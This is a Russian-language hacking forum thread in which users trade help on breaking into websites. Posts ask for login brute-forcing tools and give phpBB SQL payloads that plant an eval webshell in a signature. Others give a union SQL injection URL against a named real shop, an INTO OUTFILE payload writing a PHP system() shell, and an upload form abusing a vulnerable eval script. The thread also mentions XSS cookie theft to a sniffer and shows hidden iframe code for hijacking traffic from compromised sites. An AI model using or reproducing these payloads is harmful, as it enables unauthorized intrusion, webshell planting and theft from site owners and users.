тема такая есть веб форма логин пас капчи нету пробил вручную нету все нормально пас из 4х символов другими словами можно сбрутить легко акаунт , вопрос каким софтом ето можно сделать? что актуальное посоветуете ...
Ребят мне как сделать так что бы шелл залился нормальный человеческий я имею доступ к админке пхпбб форум UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2; че тут поменять и на что ? что бы был шелл всо??? ненадо умничать)
скачал AET2 сайт начинается с https://тутпоставилИПсайта вставил в форму программы сделал пасы и логин , но чет не работает так как надо , капчи нету , что не так ? поставил на перебор на TYPE HTTP (Form) что не так сделал ? там нету протокола https
Ты помоему спешишь куда-то постоянно В этом тоже есть: http://la2-shop.ru/categories.php?id_cat=-3'+union+select+version()--+ А можно узнать зачем использовать $_REQUEST если " уж так надо $_GET оставить" ? ) Или это какой то приватный метод, онли закрытые группы? satana8920: из-за кавычек ошибки не будет. У тебя там stripslashes стоит для этого. phpinfo вообще выводит? И что там стоит в урлфайлопен, если да
Copy() будет ограничена при safe_mode=on. Лучше move_uploaded_file(). С командной строки можна найти так найти вритабельные директории\файлы(файлы дописать!): find . -type d -perm 777 -print find . -type f -perm 777 –print Если системную команду не выполнить в php есть функция = is_writable(), через нее можна поискать вритабельные. <form action="http://host/vulnscript.php?e=move_uploaded_file($_FILES[upload_file][tmp_name],$_POST[ev2]);" method="post" enctype="multipart/form-data"> <input type="text" name="ev2" value="./style2.php"> <input name="upload_file" type="file"> <input type="submit" value="upload"> </form>
Да ладно? Какие именно ограничения будут у copy() и не будут у move_uploaded_file() при сейфмоде не просветите?
Все привет, у меня чисто теоретический вопрос - нашел сегодня маленький сайтик - голый html, ни одного php-скрипта, 100%. Все что есть - это корневой каталог со страничками и папка /cgi-bin, в ней лежит чей-то шелл. Вопрос - каким образом возможно залить его? В .htaccess никакой магии с интерпретацией html как php нет. Права на папку - drwxr-xr-x. Safe mode: OFF если что, система - линукс.
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2; сделал восстановление в бд, открыл профиль, на других такого никогда не было что за ошибка такая ?
Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь. Запрос Code: http://www.site.com/index.php?=1&id=9999999+union+select+1,2,3,4,5,6,7,8,%3C?php%20system%28$_GET[%91cmd%92]%29%20?%3E,10+INTO+OUTFILE%20%27/home/site/public_html/1.php%27%20-- Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться} В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию)
phpinfo() это функция, а не константа, после имени идут скобки и " ; " + у тебя system, код не eval -ится, не сможешь вывести phpinfo, только системные команды
кто подскажет в чем проблемма,нашел xss активную попробывал впихуть скрипт в страницу,куки сразу пришли на снифер ,а вот код в странице не сохранился xss в POST запросе
Собственно у меня вопрос. Если я имею доступ к одному сайту (или к шаблонам) что мне вставить в php код (какой код шелла) что бы трафик просто сливался на один сайт и все. Заранее спасибо!
PHP: <iframe src="http://site.ru/" width="0" height="0" frameborder="0"></iframe> это для iframe трафа PHP: <frameset rows="*,0" framespacing="0" border="0" frameborder="NO"> <frame src="site.com" scrolling="auto" noresize> </frameset> это что бы полностью твой сайт выводился
